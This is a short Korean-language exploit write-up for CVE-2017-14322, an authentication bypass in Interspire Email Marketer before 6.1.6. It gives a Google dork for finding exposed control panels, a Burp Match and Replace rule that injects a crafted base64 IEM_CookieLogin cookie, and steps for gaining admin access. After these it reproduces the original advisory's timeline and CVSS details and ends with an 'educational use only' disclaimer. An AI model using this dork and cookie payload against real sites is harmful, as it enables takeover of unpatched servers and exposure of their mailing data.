
CVE-2017-14322 Interspire Email Marketer (emailmarketer) 익스플로잇
intitle:"Control Panel" + emailmarketer
요청 헤더에 다음과 같이 Match and Replace를 추가하세요:
Match: ^Cookie.*$
Replace: Cookie: IEM_CookieLogin=YTo0OntzOjQ6InVzZXIiO3M6MToiMSI7czo0OiJ0aW1lIjtpOjE1MDU0NzcyOTQ7czo0OiJyYW5kIjtiOjE7czo4OiJ0YWtlbWV0byI7czo5OiJpbmRleC5waHAiO30%3D
사이트를 열면 처음에는 Cookie 헤더가 없기 때문에 작동하지 않습니다. 위의 규칙을 추가한 Burp 프록시를 사용하여 두 번째로 사이트를 새로고침하면 원하는 결과를 볼 수 있습니다. "Intercept Client Requests"를 체크해야 합니다.
Interspire Email Marketer - 원격 관리자 인증 우회
Hakan Küsne, Infoteam Security (CH)
CVE-2017-14322
CVSS Base Score: 9.8 CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:F/RL:O
2017-09-12 취약점 발견 2017-09-12 공급업체가 이미 수정했지만 고객에게 전달하지 않아 수백 대의 취약한 시스템이 노출됨 2017-10-17 공개 공개
버전 6.1.6 이전의 Interspire Email Marketer
http://www.interspire.com/emailmarketer/
버전 6.1.6 이전의 Interspire Email Marketer (IEM)에서 사용자가 이미 로그인했는지 확인하는 init.php 함수는 원격 공격자가 특수하게 조작된 값으로 IEM_CookieLogin 쿠키를 사용하여 인증을 우회하고 관리자 접근 권한을 획득할 수 있도록 합니다. 게다가 고객이 연간 유지 관리 계획이 없는 경우 애플리케이션은 최신 버전이라고 표시하며 업데이트가 없다고 합니다. 이 취약점들은 해당 애플리케이션의 손상된 인스턴스에 대한 침해 대응 중에 발견되었습니다.
세부 정보는 여기에서 확인하세요: https://security.infoteam.ch/en/blog/posts/narrative-of-an-incident-response-from-compromise-to-the-publication-of-the-weakness.html
공급업체는 버전 6.1.6에서 취약점을 패치했지만, 고객에게 구체적으로 알리지 않았습니다.
이 익스플로잇은 교육 목적으로만 사용되며, 귀하의 행동에 대해 책임을 지지 않습니다.